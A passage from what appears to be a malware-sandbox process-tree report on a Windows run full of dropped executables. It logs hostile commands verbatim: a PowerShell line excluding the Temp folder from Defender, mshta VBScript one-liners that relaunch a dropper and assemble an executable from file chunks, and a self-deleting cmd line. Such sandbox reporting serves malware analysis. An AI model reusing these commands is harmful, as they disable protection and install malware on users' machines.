                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\xI8yS68Tpu3kCNSU44QBhykw.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\xI8yS68Tpu3kCNSU44QBhykw.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:5544
                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\xI8yS68Tpu3kCNSU44QBhykw.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\xI8yS68Tpu3kCNSU44QBhykw.exe"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:4060
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 1904
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                        PID:4504
                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\WayqjmEj2Pq_PUl4bua9Hc2R.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\WayqjmEj2Pq_PUl4bua9Hc2R.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:5536
                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\HL0ONOO9xTh4E8f90wc3b06k.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\HL0ONOO9xTh4E8f90wc3b06k.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:5524
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\HL0ONOO9xTh4E8f90wc3b06k.exe" & exit
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:2180
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                            timeout /t 5
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                            PID:3908
                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\n3DsS2xEWbU65FEFGXsqrGdV.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\n3DsS2xEWbU65FEFGXsqrGdV.exe"
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                          PID:5848
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 268
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:5744
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                      PID:1496
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                        PID:1816
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                      PID:1772
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16205451b994.exe
                                                                                                                                                                                                                                                        Thu16205451b994.exe /mixone
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:2288
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 304
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:2352
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                      PID:2296
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1628aafb3efd7c3d.exe
                                                                                                                                                                                                                                                        Thu1628aafb3efd7c3d.exe
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:3192
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 308
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                          PID:1228
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:2220
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16466b26f8b7.exe
                                                                                                                                                                                                                                                          Thu16466b26f8b7.exe
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:4908
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 304
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                            PID:3912
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                        PID:2268
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f584bd3686.exe
                                                                                                                                                                                                                                                          Thu16f584bd3686.exe
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:2644
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                        PID:2004
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu165bd34b1e1d4d81.exe
                                                                                                                                                                                                                                                          Thu165bd34b1e1d4d81.exe
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:4012
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 1896
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:5232
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Thu161580bf75.exe
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                        PID:1944
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu161580bf75.exe
                                                                                                                                                                                                                                                          Thu161580bf75.exe
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:2696
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Thu164ba03be19.exe
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:2924
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu164ba03be19.exe
                                                                                                                                                                                                                                                            Thu164ba03be19.exe
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                            PID:2560
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu164ba03be19.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu164ba03be19.exe
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:4972
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:832
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu167d514d2a7ac5a.exe
                                                                                                                                                                                                                                                              Thu167d514d2a7ac5a.exe
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:5056
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:2832
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                              PID:4432
                                                                                                                                                                                                                                                      • C:\Windows\System32\Upfc.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\Upfc.exe /launchtype periodic /cv clZulJdZrEmnxn7nVWmdrw.0
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:2376
                                                                                                                                                                                                                                                          • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\sihclient.exe /cv clZulJdZrEmnxn7nVWmdrw.0.2
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:5192
                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                            PID:4848
                                                                                                                                                                                                                                                          • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\sihclient.exe /cv 92GwURs0+UOTl7UTHcO7Cw.0.2
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                            PID:4616
                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                            PID:3060
                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:2232
                                                                                                                                                                                                                                                            • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                                                                                                                              C:\Windows\System32\WaaSMedicAgent.exe f09cd4e4115abaa1e141ee1a978a44bd clZulJdZrEmnxn7nVWmdrw.0.1.0.3.0
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                              PID:1716
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1653d94a8da.exe
                                                                                                                                                                                                                                                              Thu1653d94a8da.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:1500
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1653d94a8da.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:568
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1653d94a8da.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1653d94a8da.exe" ) do taskkill /F -Im "%~NxU"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:3712
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                                                                                                                                                                        09xU.EXE -pPtzyIkqLZoCarb5ew
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:5080
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:716
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:4516
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:2128
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                      PID:4944
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                          PID:4504
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                            PID:780
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                                                                            control .\R6f7sE.I
                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                              PID:4540
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                PID:4508
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                    PID:5916
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                        PID:3656
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                            taskkill /F -Im "Thu1653d94a8da.exe"
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                            PID:2340
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f3de88a335950bb.exe
                                                                                                                                                                                                                                                                                      Thu16f3de88a335950bb.exe
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      PID:3408
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-NQOGS.tmp\Thu16f3de88a335950bb.tmp
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-NQOGS.tmp\Thu16f3de88a335950bb.tmp" /SL5="$200B8,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f3de88a335950bb.exe"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                        PID:4976
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f3de88a335950bb.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f3de88a335950bb.exe" /SILENT
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:1360
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-K470I.tmp\Thu16f3de88a335950bb.tmp
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-K470I.tmp\Thu16f3de88a335950bb.tmp" /SL5="$300B8,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f3de88a335950bb.exe" /SILENT
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          PID:1488
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-H30O0.tmp\postback.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-H30O0.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            PID:3668
                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                            PID:2340
                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            PID:4044
                                                                                                                                                                                                                                                                                            • C:\4d123062de93133ad650a1e18d30\Setup.exe
                                                                                                                                                                                                                                                                                              C:\4d123062de93133ad650a1e18d30\\Setup.exe /q /norestart /x86 /x64 /web
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              PID:2156
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:1540
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2288 -ip 2288
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:1164
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4908 -ip 4908
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:3548
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3192 -ip 3192
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:3240
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                        PID:1444
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          PID:4348
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 448
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                            PID:564
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4348 -ip 4348
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:4040
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:2244
                                                                                                                                                                                                                                                                                        • C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                                                                                                                                                                                                          C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:2832
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4012 -ip 4012
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:5044
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5848 -ip 5848
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:5360
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5508 -ip 5508
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:5216
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5544 -ip 5544
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:5416
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3344 -ip 3344
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:5924
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4928 -ip 4928
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:3692
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                                                                                                                                                                      1⤵
